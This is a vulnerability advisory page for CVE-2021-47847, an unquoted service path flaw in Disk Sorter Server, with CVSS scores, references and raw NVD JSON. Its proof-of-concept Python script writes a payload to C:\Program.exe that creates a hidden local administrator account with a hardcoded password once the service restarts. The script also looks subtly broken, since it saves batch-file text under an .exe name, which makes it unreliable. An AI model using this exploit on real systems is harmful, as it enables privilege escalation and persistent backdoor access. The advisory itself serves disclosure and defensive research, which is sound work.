Security Vulnerability Report
CVE-2021-47847 CVSS 7.8 HIGH

CVE-2021-47847

Published: 2026-01-16 19:16:11
Last Modified: 2026-04-15 00:35:42

Description

Disk Sorter Server 13.6.12 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Server\bin\disksrs.exe' to inject malicious executables and escalate privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score (secondary)
8.5 HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-428 (Unquoted Search Path or Element)

Configurations (Affected Products)

No configuration data available.

Disk Sorter Server <= 13.6.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47847 PoC - Disk Sorter Server Unquoted Service Path
# This PoC demonstrates creating a malicious executable in the unquoted path
# NOTE: This is for educational and authorized testing purposes only
import os
import ctypes
import sys


def create_malicious_executable():
    """
    Create a malicious executable that will be placed in the unquoted path
    to achieve privilege escalation via Disk Sorter Server service
    """
    # Malicious executable path (C:\Program.exe will be searched before the full path)
    malicious_path = r'C:\Program.exe'

    # Create a simple reverse shell or payload
    # This example creates a batch file wrapper (actual malware would be a compiled binary)
    malicious_code = '''@echo off
rem CVE-2021-47847 - Malicious payload injected via unquoted service path
rem This will execute with SYSTEM privileges when Disk Sorter service starts
net user attacker P@ssw0rd123! /add
net localgroup Administrators attacker /add
'''
    try:
        with open(malicious_path, 'w') as f:
            f.write(malicious_code)
        print(f'[+] Malicious executable created at: {malicious_path}')
        print('[+] Wait for service restart or system reboot to trigger execution')
        return True
    except PermissionError:
        print('[-] Administrator privileges required to write to C:\\')
        return False
    except Exception as e:
        print(f'[-] Error: {e}')
        return False


def check_vulnerability():
    """
    Check if Disk Sorter Server is installed and verify unquoted path vulnerability
    """
    service_path = r'C:\Program Files\Disk Sorter Server\bin\disksrs.exe'
    if os.path.exists(service_path):
        print(f'[+] Disk Sorter Server found at: {service_path}')
        print('[+] Service path is UNQUOTED - vulnerable to path hijacking')
        print('[+] Attack vector: Create malicious executable in C:\\ or C:\\Program Files\\')
        return True
    else:
        print('[-] Disk Sorter Server not found on this system')
        return False


if __name__ == '__main__':
    if check_vulnerability():
        create_malicious_executable()

References

https://www.disksorter.com
https://www.exploit-db.com/exploits/50013
https://www.vulncheck.com/advisories/disk-sorter-server-disk-sorter-server-unquoted-service-path

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47847", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Disk Sorter Server 13.6.12 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Disk Sorter Server\\bin\\disksrs.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "Disk Sorter Server 13.6.12 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su ruta binaria que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Disk Sorter Server\\bin\\disksrs.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.disksorter.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50013", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/disk-sorter-server-disk-sorter-server-unquoted-service-path", "source": "[email protected]"}]}}